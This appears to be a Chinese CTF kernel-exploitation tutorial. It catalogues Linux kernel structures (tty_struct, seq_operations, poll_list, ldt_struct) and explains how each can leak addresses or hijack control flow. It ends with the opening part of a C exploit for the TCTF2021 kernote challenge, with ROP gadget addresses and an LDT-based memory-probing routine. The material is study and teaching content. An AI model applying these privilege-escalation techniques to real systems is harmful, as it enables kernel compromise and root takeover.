linux kernel pwn 常用结构体

sky123

tty 设备结构体

tty 设备在 /dev 下有一个伪终端设备 ptmx。

tty_struct(kmalloc-1k | GFP_KERNEL_ACCOUNT)

tty_struct 定义如下 。

1
2
3
4
5
6
7
8
9
/* tty magic number */
#define TTY_MAGIC 0x5401

/*
 * Abridged excerpt of struct tty_struct: only the two members discussed in
 * this article are shown; each "..." stands for elided members.
 */
struct tty_struct {
int magic; /* first member of the structure; the article uses TTY_MAGIC to locate it */
...
const struct tty_operations *ops; /* pointer to the tty operations table */
...
}

分配/释放

alloc_tty_struct 函数中进行 tty_struct 的分配。

1
2
3
4
5
6
7
struct tty_struct *alloc_tty_struct(struct tty_driver *driver, int idx)
{
struct tty_struct *tty;

tty = kzalloc(sizeof(*tty), GFP_KERNEL_ACCOUNT);
if (!tty)
return NULL;

通常情况下我们选择打开 /dev/ptmx 来在内核中分配一个 tty_struct 结构体,相应地当我们将其关闭时该结构体便会被释放回 slab/slub 中。

魔数

tty_struct 的魔数为 0x5401,位于该结构体的开头,我们可以利用对该魔数的搜索以锁定该结构体

tty_operations

内核中 tty 设备的 ops 函数表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/*
 * Table of function pointers through which tty operations are dispatched.
 * Most callbacks receive the struct tty_struct pointer as their first
 * argument; lookup/install/remove and the poll_* hooks take the
 * struct tty_driver instead.
 */
struct tty_operations {
/* Driver-level hooks: find, attach and detach a tty for a driver. */
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
/* Per-tty lifecycle hooks. */
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
/* Output path. */
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
unsigned int (*write_room)(struct tty_struct *tty);
unsigned int (*chars_in_buffer)(struct tty_struct *tty);
/* ioctl entry points (native and compat). */
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
/* Line settings and flow control. */
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
/* Modem lines, window size, counters and serial settings. */
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
int (*get_serial)(struct tty_struct *tty, struct serial_struct *p);
int (*set_serial)(struct tty_struct *tty, struct serial_struct *p);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
/* Console polling hooks, only present with CONFIG_CONSOLE_POLL. */
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;

数据泄露

tty_operations 在内核中的数据段,通过 uaf + tty 堆喷泄露 tty_struct 中的 ops 指针即可泄露内核基址。

劫持内核执行流

与 glibc 中的 vtable 攻击类似,通过劫持 tty_struct 中的 ops 指针到伪造的 tty_operations 。劫持控制流时,通常第一个参数为 tty_struct 结构体地址,即 rdi 指向 tty_struct 结构体,可以通过 gadget 将栈迁移至 tty_struct 结构体。

1
2
3
4
5
.text:FFFFFFFF81238D50 push    rdi
.text:FFFFFFFF81238D51 pop rsp
.text:FFFFFFFF81238D52 pop rbp
.text:FFFFFFFF81238D53 add rax, rdx
.text:FFFFFFFF81238D56 retn

或者利用 work_for_cpu_fn 函数完成函数调用传参和保存返回值。

1
2
3
/*
 * Decompiler-style pseudo-C (note the non-standard __fastcall / __int64).
 * Calls the function pointer stored in args[4] with args[5] as its single
 * argument and stores the return value in args[6].
 */
void __fastcall work_for_cpu_fn(size_t *args) {
args[6] = ((__int64 (__fastcall *)(size_t))args[4])(args[5]);
}

tty_file_private (kmalloc-32 | GFP_KERNEL)

1
2
3
4
5
/*
 * Per-open bookkeeping object linking one struct file to the tty it was
 * opened on.
 */
struct tty_file_private {
struct tty_struct *tty; /* the tty this file refers to */
struct file *file; /* the owning file */
struct list_head list; /* node linked into the tty's tty_files list */
};

分配/释放

打开 /dev/ptmx 时会分配 tty_file_private 并且该结构体的 tty 指针会指向 tty_struct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
int tty_alloc_file(struct file *file)
{
struct tty_file_private *priv;

priv = kmalloc(sizeof(*priv), GFP_KERNEL);
if (!priv)
return -ENOMEM;

file->private_data = priv;

return 0;
}

/*
 * Bind an opened file to its tty: fill in the tty_file_private previously
 * stored in file->private_data and link it into the tty's list of files.
 */
void tty_add_file(struct tty_struct *tty, struct file *file)
{
	struct tty_file_private *fpriv;

	fpriv = file->private_data;
	fpriv->file = file;
	fpriv->tty = tty;

	/* The tty_files list is modified with files_lock held. */
	spin_lock(&tty->files_lock);
	list_add(&fpriv->list, &tty->tty_files);
	spin_unlock(&tty->files_lock);
}


/*
 * Abridged open handler for /dev/ptmx ("..." marks elided code). The three
 * calls shown are, in order: allocation of the tty_file_private for filp,
 * creation of the tty via tty_init_dev(), and linking of the two.
 */
static int ptmx_open(struct inode *inode, struct file *filp)
{
struct tty_struct *tty;
...
retval = tty_alloc_file(filp);
...
tty = tty_init_dev(ptm_driver, index);
...
tty_add_file(tty, filp);
...
}

相应的,当关闭打开的 /dev/ptmx 时会释放相应结构。

数据泄露

读取 tty_file_private 可以泄露对应的 tty_struct 地址,也就是一个 kmalloc-1k 的 object 的地址,之后我们可以通过释放 tty_struct + pipe_buffer 堆喷 + poll_list 任意地址释放 + user_key_payload 劫持修改的方式劫持控制流提权。

seq_file 相关

序列文件接口(Sequence File Interface)是针对 procfs 默认操作函数每次只能读取一页数据从而难以处理较大 proc 文件的情况下出现的,其为内核编程提供了更为友好的接口。

seq_file

为了简化操作,在内核 seq_file 系列接口中为 file 结构体提供了 private data 成员 seq_file 结构体,该结构体定义于 /include/linux/seq_file.h 当中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * State object of the sequence-file interface; single_open() reaches it
 * through file->private_data.
 */
struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
struct mutex lock;
const struct seq_operations *op; /* iterator callbacks (start/stop/next/show) */
int poll_event;
const struct file *file;
void *private; /* caller-supplied data; single_open() stores its data argument here */
};

seq_file 在 seq_open 时被分配,但是由于从单独的 seq_file_cache 中分配,因此很难利用。

1
2
3
4
5
6
7
8
9
/*
 * Create the dedicated slab cache (seq_file_cache) that seq_open() later
 * allocates struct seq_file objects from.
 */
void __init seq_file_init(void)
{
seq_file_cache = KMEM_CACHE(seq_file, SLAB_ACCOUNT|SLAB_PANIC);
}

int seq_open(struct file *file, const struct seq_operations *op)
{
...
p = kmem_cache_zalloc(seq_file_cache, GFP_KERNEL);

seq_operations(kmalloc-32 | GFP_KERNEL_ACCOUNT)

该结构体定义于 /include/linux/seq_file.h 当中,只定义了四个函数指针,如下:

1
2
3
4
5
6
/*
 * Iterator callbacks of a sequence file: four function pointers and
 * nothing else. start is the first member of the structure.
 */
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

分配/释放

seq_operations 分配过程存在如下调用链:

1
2
3
stat_open()        <--- stat_proc_ops.proc_open
single_open_size()
single_open()

其中 single_open 函数定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int single_open(struct file *file, int (*show)(struct seq_file *, void *),
void *data)
{
struct seq_operations *op = kmalloc(sizeof(*op), GFP_KERNEL_ACCOUNT);
int res = -ENOMEM;

if (op) {
op->start = single_start;
op->next = single_next;
op->stop = single_stop;
op->show = show;
res = seq_open(file, op);
if (!res)
((struct seq_file *)file->private_data)->private = data;
else
kfree(op);
}
return res;
}
EXPORT_SYMBOL(single_open);

注意到 stat_open() 为 procfs 中的 stat 文件对应的 proc_ops 函数表中 open 函数对应的默认函数指针,在内核源码 fs/proc/stat.c 中有如下定义:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * proc_ops table registered for the procfs "stat" entry: opening goes
 * through stat_open(), reading through seq_read_iter(), and release
 * through single_release().
 */
static const struct proc_ops stat_proc_ops = {
.proc_flags = PROC_ENTRY_PERMANENT,
.proc_open = stat_open,
.proc_read_iter = seq_read_iter,
.proc_lseek = seq_lseek,
.proc_release = single_release,
};

/*
 * Register the "stat" procfs entry with stat_proc_ops. The NULL parent
 * argument presumably places it at the procfs root (i.e. /proc/stat) -
 * confirm against proc_create().
 */
static int __init proc_stat_init(void)
{
proc_create("stat", 0, NULL, &stat_proc_ops);
return 0;
}
fs_initcall(proc_stat_init);

即该文件对应的是 /proc/stat 文件;而 /proc/self/stat(即 /proc/<pid>/stat)同样是经由 single_open() 打开的,因此只要我们打开 /proc/self/stat 文件便能分配到新的 seq_operations 结构体。

对应地,定义于 fs/seq_file.c 中的 single_release() 为 stat 文件的 proc_ops 的默认 release 指针,其会释放掉对应的 seq_operations 结构体,故我们只需要关闭文件即可释放该结构体。

数据泄露

通过泄露 seq_operations 结构体的内容可以泄露内核基址。

劫持内核执行流

当我们 read 一个 stat 文件时,内核会调用其 proc_ops 的 proc_read_iter 指针,其默认值为 seq_read_iter() 函数,定义于 fs/seq_file.c 中,注意到有如下逻辑:

1
2
3
4
5
6
ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
struct seq_file *m = iocb->ki_filp->private_data;
//...
p = m->op->start(m, &m->index);
//...

即其会调用 seq_operations 中的 start 函数指针,那么我们只需要控制 seq_operations->start 后再读取对应 stat 文件便能控制内核执行流

由于劫持控制流后参数不容易控制,因此这个方法通常只在早期版本的内核中栈迁移到 pt_regs 上利用。

poll 系统调用

poll_list (kmalloc-(32-4k) | GFP_KERNEL)

poll_list 对象是在调用 poll() 时分配,该调用可以监视 1 个或多个文件描述符的活动。

1
2
3
4
5
6
7
8
9
10
11
/* One poll() request/response record for a single file descriptor. */
struct pollfd {
int fd; /* file descriptor to watch */
short events; /* requested events */
short revents; /* returned events; do_sys_poll() copies this field back to user space */
};

/*
 * One chunk of pollfd entries used by do_sys_poll(). Chunks form a singly
 * linked list through next; each chunk carries len entries in the trailing
 * array.
 */
struct poll_list {
	struct poll_list *next;		/* next chunk, or NULL for the last one */
	int len;			/* number of entries stored in this chunk */
	struct pollfd entries[];	/* C99 flexible array member (was the GNU [0] form) */
};

poll_list 结构如下图所示:前 30 个 pollfd 存放在栈上,其余的存放在堆上;堆上的每个 poll_list 最多容纳 510 个 pollfd,即单个堆上 poll_list 最大为 0x1000 字节。

分配/释放

do_sys_poll 函数完成 poll_list 的分配和释放。

poll_list 是超时自动释放的,我们可以指定 poll_list 的释放时间。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#define POLL_STACK_ALLOC	256
#define PAGE_SIZE 4096

/* Max pollfd entries in one page-sized heap poll_list: (4096 - 16) / 8 = 510. */
#define POLLFD_PER_PAGE ((PAGE_SIZE-sizeof(struct poll_list)) / sizeof(struct pollfd))

/*
 * Max pollfd entries in the on-stack buffer: (256 - 16) / 8 = 30.
 * The annotation lives here rather than after the backslash: a line
 * continuation must be the last character on the line, otherwise the macro
 * body is cut short and the next line becomes a stray statement.
 */
#define N_STACK_PPS ((sizeof(stack_pps) - sizeof(struct poll_list)) / \
			sizeof(struct pollfd))

[...]

/*
 * Core of poll(): copy the user's pollfd array into a chain of poll_list
 * chunks, wait in do_poll(), copy every revents field back to user space,
 * then free the heap-allocated chunks.
 *
 * @ufds:     user-space array of pollfd entries
 * @nfds:     number of entries in @ufds
 * @end_time: timeout handed through to do_poll()
 *
 * Returns the value of do_poll() on success, -EINVAL when nfds exceeds
 * RLIMIT_NOFILE, -EFAULT when user memory cannot be read or written, or
 * -ENOMEM when a chunk cannot be allocated.
 */
static int do_sys_poll(struct pollfd __user *ufds, unsigned int nfds,
		struct timespec64 *end_time)
{
	struct poll_wqueues table;
	int err = -EFAULT, fdcount, len;
	/* Allocate small arguments on the stack to save memory and be
	   faster - use long to make sure the buffer is aligned properly
	   on 64 bit archs to avoid unaligned access */
	/* [1] stack_pps: 256-byte stack buffer holding the first 30 pollfd entries. */
	long stack_pps[POLL_STACK_ALLOC/sizeof(long)];
	struct poll_list *const head = (struct poll_list *)stack_pps;
	struct poll_list *walk = head;
	unsigned long todo = nfds;

	if (nfds > rlimit(RLIMIT_NOFILE))
		return -EINVAL;

	/* [2] The first 30 pollfd entries go on the stack to save memory and time. */
	len = min_t(unsigned int, nfds, N_STACK_PPS);

	for (;;) {
		walk->next = NULL;
		walk->len = len;
		if (!len)
			break;

		if (copy_from_user(walk->entries, ufds + nfds-todo,
					sizeof(struct pollfd) * walk->len))
			goto out_fds;

		todo -= walk->len;
		if (!todo)
			break;

		/*
		 * [3] Entries beyond the first 30 are stored on the kernel
		 * heap. One chunk holds at most POLLFD_PER_PAGE (510) entries;
		 * further chunks are allocated in a loop until every entry
		 * passed in has been stored.
		 */
		len = min(todo, POLLFD_PER_PAGE);
		/*
		 * [4] The number of watched descriptors determines the
		 * allocation size, anywhere from kmalloc-32 to kmalloc-4k.
		 */
		walk = walk->next = kmalloc(struct_size(walk, entries, len),
					    GFP_KERNEL);
		if (!walk) {
			err = -ENOMEM;
			goto out_fds;
		}
	}

	poll_initwait(&table);
	/*
	 * [5] With the poll_list chain built, do_poll() watches the
	 * descriptors until an event occurs or the timeout expires. end_time
	 * is the timeout originally given to poll(), so the poll_list objects
	 * stay allocated for a caller-chosen duration and are freed once it
	 * elapses.
	 */
	fdcount = do_poll(head, &table, end_time);
	poll_freewait(&table);

	/* Fixed: the quoted source had a stray "and" token inside this condition. */
	if (!user_write_access_begin(ufds, nfds * sizeof(*ufds)))
		goto out_fds;

	for (walk = head; walk; walk = walk->next) {
		struct pollfd *fds = walk->entries;
		int j;

		for (j = walk->len; j; fds++, ufds++, j--)
			unsafe_put_user(fds->revents, &ufds->revents, Efault);
	}
	user_write_access_end();

	err = fdcount;
out_fds:
	/* The head chunk lives in stack_pps, so freeing starts at head->next. */
	walk = head->next;
	/*
	 * [6] Release the poll_list chain: walk the singly linked list and
	 * kfree() every heap chunk. This is the spot the article exploits.
	 */
	while (walk) {
		struct poll_list *pos = walk;
		walk = walk->next;
		kfree(pos);
	}

	return err;

Efault:
	user_write_access_end();
	err = -EFAULT;
	goto out_fds;
}

任意地址释放

通过某种手段修改 poll_list 的 next 指针可以完成任意地址释放形成 UAF 。

img

ldt_struct 与 modify_ldt 系统调用

ldt_struct: kmalloc-16(slub)/kmalloc-32(slab)

在内核中与 LDT 相关联的结构体为 ldt_struct 。该结构体定义于内核源码 arch/x86/include/asm/mmu_context.h 中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/*
 * Per-process LDT descriptor: a pointer to the entries array, the number
 * of entries, and the alias-mapping slot.
 */
struct ldt_struct {
/*
* Xen requires page-aligned LDTs with special permissions. This is
* needed to prevent us from installing evil descriptors such as
* call gates. On native, we could merge the ldt_struct and LDT
* allocations, but it's not worth trying to optimize.
*/
struct desc_struct *entries; /* first member; read_ldt() copies from this pointer to user space */
unsigned int nr_entries;

/*
* If PTI is in use, then the entries array is not mapped while we're
* in user mode. The whole array will be aliased at the addressed
* given by ldt_slot_va(slot). We use two slots so that we can allocate
* and map, and enable a new LDT without invalidating the mapping
* of an older, still-in-use LDT.
*
* slot will be -1 if this LDT doesn't have an alias mapping.
*/
int slot;
};

modify_ldt 系统调用可以用来操纵对应进程的 ldt_struct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
 * modify_ldt system call entry: dispatch on func.
 *   0    -> read_ldt(ptr, bytecount)
 *   1    -> write_ldt(ptr, bytecount, 1)
 *   2    -> read_default_ldt(ptr, bytecount)
 *   0x11 -> write_ldt(ptr, bytecount, 0)
 * Any other func leaves ret at -ENOSYS.
 */
SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr ,
unsigned long , bytecount)
{
int ret = -ENOSYS;

switch (func) {
case 0:
ret = read_ldt(ptr, bytecount);
break;
case 1:
ret = write_ldt(ptr, bytecount, 1);
break;
case 2:
ret = read_default_ldt(ptr, bytecount);
break;
case 0x11:
ret = write_ldt(ptr, bytecount, 0);
break;
}
/*
* The SYSCALL_DEFINE() macros give us an 'unsigned long'
* return type, but the ABI for sys_modify_ldt() expects
* 'int'. This cast gives us an int-sized value in %rax
* for the return code. The 'unsigned' is necessary so
* the compiler does not try to sign-extend the negative
* return codes into the high half of the register when
* taking the value from int->long.
*/
return (unsigned int)ret;
}

分配(GFP_KERNEL):modify_ldt 系统调用 - write_ldt()

write_ldt() 定义于 /arch/x86/kernel/ldt.c中,我们主要关注如下逻辑:

1
2
3
4
5
6
7
/*
 * Abridged excerpt ("//..." marks elided code). The part shown is the
 * allocation of a new ldt_struct through alloc_ldt_struct(), with the
 * error code preset to -ENOMEM beforehand.
 */
static int write_ldt(void __user *ptr, unsigned long bytecount, int oldmode)
{
//...
error = -ENOMEM;
new_ldt = alloc_ldt_struct(new_nr_entries);
//...
}

我们注意到在 write_ldt() 当中会使用 alloc_ldt_struct() 函数来为新的 ldt_struct 分配空间,随后将之应用到进程,alloc_ldt_struct() 函数定义于 arch/x86/kernel/ldt.c 中,我们主要关注如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
/* The caller must call finalize_ldt_struct on the result. LDT starts zeroed. */
static struct ldt_struct *alloc_ldt_struct(unsigned int num_entries)
{
struct ldt_struct *new_ldt;
unsigned int alloc_size;

if (num_entries > LDT_ENTRIES)
return NULL;

new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL);
//...

即我们可以通过 modify_ldt 系统调用来分配新的 ldt_struct

数据泄露:modify_ldt 系统调用 - read_ldt()

read_ldt() 定义于 /arch/x86/kernel/ldt.c中,我们主要关注如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
/*
 * Abridged excerpt ("//..." marks elided code). The part shown copies
 * entries_size bytes starting at mm->context.ldt->entries to the user
 * buffer and turns a copy failure into -EFAULT instead of crashing.
 */
static int read_ldt(void __user *ptr, unsigned long bytecount)
{
//...
if (copy_to_user(ptr, mm->context.ldt->entries, entries_size)) {
retval = -EFAULT;
goto out_unlock;
}
//...
out_unlock:
up_read(&mm->context.ldt_usr_sem);
return retval;
}

在这里会直接调用 copy_to_user 向用户地址空间拷贝数据,我们不难想到的是若是能够控制 ldt->entries 便能够完成内核的任意地址读,由此泄露出内核数据 。

开启 KASLR 的情况下首先需要泄露内核基址,再考虑进行任意地址读。

这里我们要用到 copy_to_user() 的一个特性:对于非法地址,其并不会造成 kernel panic,只会返回一个非零的错误码,我们不难想到的是,我们可以多次修改 ldt->entries 并多次调用 modify_ldt()爆破内核 .text 段地址与 page_offset_base,若是成功命中,则 modify_ldt 会返回给我们一个非负值 。

但直接爆破代码段地址并非一个明智的选择,由于 Hardened usercopy 的存在,对于直接拷贝代码段上数据的行为会导致 kernel panic。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
* Validates that the given object is:
* - not bogus address
* - fully contained by stack (or stack frame, when available)
* - fully within SLAB object (or object whitelist area, when available)
* - not in kernel text
*
* Abridged excerpt: "..." stands for the earlier checks; only the heap
* object check and the kernel text check are shown.
*/
void __check_object_size(const void *ptr, unsigned long n, bool to_user)
{
...
/* Check for bad heap object. */
check_heap_object(ptr, n, to_user);

/* Check for object in kernel to avoid text exposure. */
check_kernel_text_object((const unsigned long)ptr, n, to_user);
}

/*
 * check_object_size(): with CONFIG_HARDENED_USERCOPY it forwards to
 * __check_object_size() whenever n is not a compile-time constant; without
 * that option it is an empty stub.
 */
#ifdef CONFIG_HARDENED_USERCOPY
extern void __check_object_size(const void *ptr, unsigned long n,
bool to_user);

static __always_inline void check_object_size(const void *ptr, unsigned long n,
bool to_user)
{
/* Sizes known at compile time are skipped here. */
if (!__builtin_constant_p(n))
__check_object_size(ptr, n, to_user);
}
#else
static inline void check_object_size(const void *ptr, unsigned long n,
bool to_user)
{ }
#endif /* CONFIG_HARDENED_USERCOPY */

/*
 * Abridged excerpt ("..." marks elided checks). The part shown runs
 * check_object_size() on the kernel-side buffer and then reports success.
 */
static __always_inline bool
check_copy_size(const void *addr, size_t bytes, bool is_source)
{
...
check_object_size(addr, bytes, is_source);
return true;
}

/*
 * Copy n bytes from kernel memory at from to user memory at to. The copy
 * is attempted only when check_copy_size() accepts the source buffer;
 * otherwise n is returned unchanged. When the copy runs, the return value
 * is whatever _copy_to_user() returns.
 */
static __always_inline unsigned long __must_check
copy_to_user(void __user *to, const void *from, unsigned long n)
{
if (likely(check_copy_size(from, n, true)))
n = _copy_to_user(to, from, n);
return n;
}

因此现实场景中我们很难直接爆破代码段加载基地址,但是在 page_offset_base + 0x9d000 的地方存储着 secondary_startup_64 函数的地址,因此我们可以直接将 ldt_struct->entries 设为 page_offset_base + 0x9d000 之后再通过 read_ldt() 进行读取即可泄露出内核代码段基地址。

虽然在线性映射区域可以任意地址读,但是由于 check_heap_object 的检查,当读取长度超过其中指向的 object 范围则会触发 kernel panic(前面爆破 page_offset_base 可以通过 hardened usercopy 检查是因为每次读 8 字节一定在 object 范围)。

ldt 是一个与进程全局相关的东西,因此现在让我们将目光放到与进程相关的其他方面上——观察 fork 系统调用的源码,我们可以发现如下执行链:

1
2
3
4
5
6
7
8
sys_fork()
kernel_clone()
copy_process()
copy_mm()
dup_mm()
dup_mmap()
arch_dup_mmap()
ldt_dup_context()

ldt_dup_context() 定义于 arch/x86/kernel/ldt.c 中,注意到如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
* Called on fork from arch_dup_mmap(). Just copy the current LDT state,
* the new task is not running, so nothing can be installed.
*
* Abridged excerpt ("//..." marks elided code). The part shown copies the
* parent's LDT entries into the new LDT with a plain in-kernel memcpy().
*/
int ldt_dup_context(struct mm_struct *old_mm, struct mm_struct *mm)
{
//...

memcpy(new_ldt->entries, old_mm->context.ldt->entries,
new_ldt->nr_entries * LDT_ENTRY_SIZE);

//...
}

在这里会通过 memcpy 将父进程的 ldt->entries 拷贝给子进程,是完全处在内核中的操作,因此不会触发 hardened usercopy 的检查,我们只需要在父进程中设定好搜索的地址之后再开子进程来用 read_ldt() 读取数据即可。

例题:TCTF2021-FINAL kernote

附件下载链接

  • 0x6666 功能将 object 指针保存在 note 中。

    1
    2
    3
    4
    5
    6
    7
    if ( request == 0x6666 )                    // copy ptr
    {
    v10 = -1LL;
    if ( val > 0xF )
    goto LABEL_15;
    note = buf[val];
    }
  • 0x6668 功能释放 object 同时将 buf 中存放的 object 指针清空。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    if ( request == 0x6668 )                      // delete
    {
    v10 = -1LL;
    if ( val <= 0xF )
    {
    object = buf[val];
    if ( object )
    {
    kfree(object);
    v10 = 0LL;
    buf[val] = 0LL;
    }
    }
    goto LABEL_15;
    }
  • 0x6669 功能修改 object 的前 8 字节,这里是根据 note 访问 object 因此存在 UAF 。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    if ( request == 0x6669 )                      // edit
    {
    v10 = -1LL;
    if ( note )
    {
    *note = val;
    v10 = 0LL;
    }
    goto LABEL_15;
    }

因此通过 ldt 泄露内核基址之后利用 seq_operations + pt_regs 写 rop 实现提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <sched.h>
#include <stdbool.h>

/*
 * Kernel addresses used by the ROP chain. The values are un-slid
 * addresses; main() adds the leaked kernel offset to each before use.
 */
size_t init_cred = 0xffffffff8266b780;
size_t commit_creds = 0xffffffff810c9dd0;
size_t pop_rdi_ret = 0xffffffff81075c4c;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00fb0;
size_t add_rsp_0x198_ret = 0xffffffff810b3f9b;
/* File descriptors: the kernote device and the /proc/self/stat seq file. */
int kernote_fd, seq_fd;

/* ioctl 0x6666: make the driver's note pointer refer to slot index. */
void chunk_set(int index) {
    const int request = 0x6666;

    ioctl(kernote_fd, request, index);
}

/* ioctl 0x6667 on slot index (presumably the allocation command - confirm against the driver). */
void chunk_add(int index) {
    const int request = 0x6667;

    ioctl(kernote_fd, request, index);
}

/* ioctl 0x6668: free the object in slot index and clear that slot. */
void chunk_delete(int index) {
    const int request = 0x6668;

    ioctl(kernote_fd, request, index);
}

/* ioctl 0x6669: overwrite the first 8 bytes of the object the note points at with data. */
void chunk_edit(size_t data) {
    const int request = 0x6669;

    ioctl(kernote_fd, request, data);
}

/*
 * Restrict the calling process to a single CPU.
 *
 * core: index of the CPU to run on. The result of sched_setaffinity() is
 * not checked.
 */
void bind_core(int core) {
    cpu_set_t allowed;
    pid_t self = getpid();

    CPU_ZERO(&allowed);
    CPU_SET(core, &allowed);
    sched_setaffinity(self, sizeof(allowed), &allowed);
}

/* Un-slid address of secondary_startup_64; mem_finder() matches its low 12 bits. */
#define SECONDARY_STARTUP_64 0xFFFFFFFF81000040
/* Number of bytes fetched by one read_ldt-based arbitrary read. */
#define LDT_BUF_SIZE 0x8000

/*
 * Fill in the user_desc passed to modify_ldt: entry number 0x8000 / 8,
 * base address 0xff0000, and every other field cleared.
 */
static inline void init_desc(struct user_desc *desc) {
    /* The two fields that carry non-zero values. */
    desc->entry_number = 0x8000 / 8;
    desc->base_addr = 0xff0000;

    /* Everything else is zeroed explicitly. */
    desc->limit = 0;
    desc->limit_in_pages = 0;
    desc->seg_32bit = 0;
    desc->seg_not_present = 0;
    desc->contents = 0;
    desc->read_exec_only = 0;
    desc->useable = 0;
    desc->lm = 0;
}

/*
 * Brute-force the base of the kernel direct mapping through modify_ldt.
 *
 * ldt_cracker(cracker_args) is called once before an LDT is installed with
 * modify_ldt func 1 (write). After that, each round calls
 * ldt_momdifier(momdifier_args, candidate) and tries an 8-byte modify_ldt
 * func 0 (read). Candidates start at 0xffff888000000000 - burte_size and
 * advance by burte_size per round.
 *
 * Returns the first candidate for which the read returns a positive value,
 * or (size_t)-1 when the read returns 0 (reported as "no mm->context.ldt").
 * Negative results make the loop continue; there is no upper bound.
 */
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void *),
                                        void *cracker_args,
                                        void *(*ldt_momdifier)(void *, size_t),
                                        void *momdifier_args,
                                        uint64_t burte_size) {
    struct user_desc ldt_entry;
    uint64_t probe;
    uint64_t candidate = 0xffff888000000000 - burte_size;

    /* Prepare the descriptor and let the caller set up the heap first. */
    init_desc(&ldt_entry);
    ldt_cracker(cracker_args);
    syscall(SYS_modify_ldt, 1, &ldt_entry, sizeof(ldt_entry));

    for (;; candidate += burte_size) {
        ldt_momdifier(momdifier_args, candidate);

        int rc = syscall(SYS_modify_ldt, 0, &probe, 8);
        if (rc > 0) {
            return candidate;
        }
        if (rc == 0) {
            printf("[x] no mm->context.ldt!");
            return (uint64_t) -1;
        }
    }
}

/*
 * Read LDT_BUF_SIZE bytes from a kernel address via a forked child.
 *
 * ldt_momdifier(momdifier_args, addr) is called first to point the
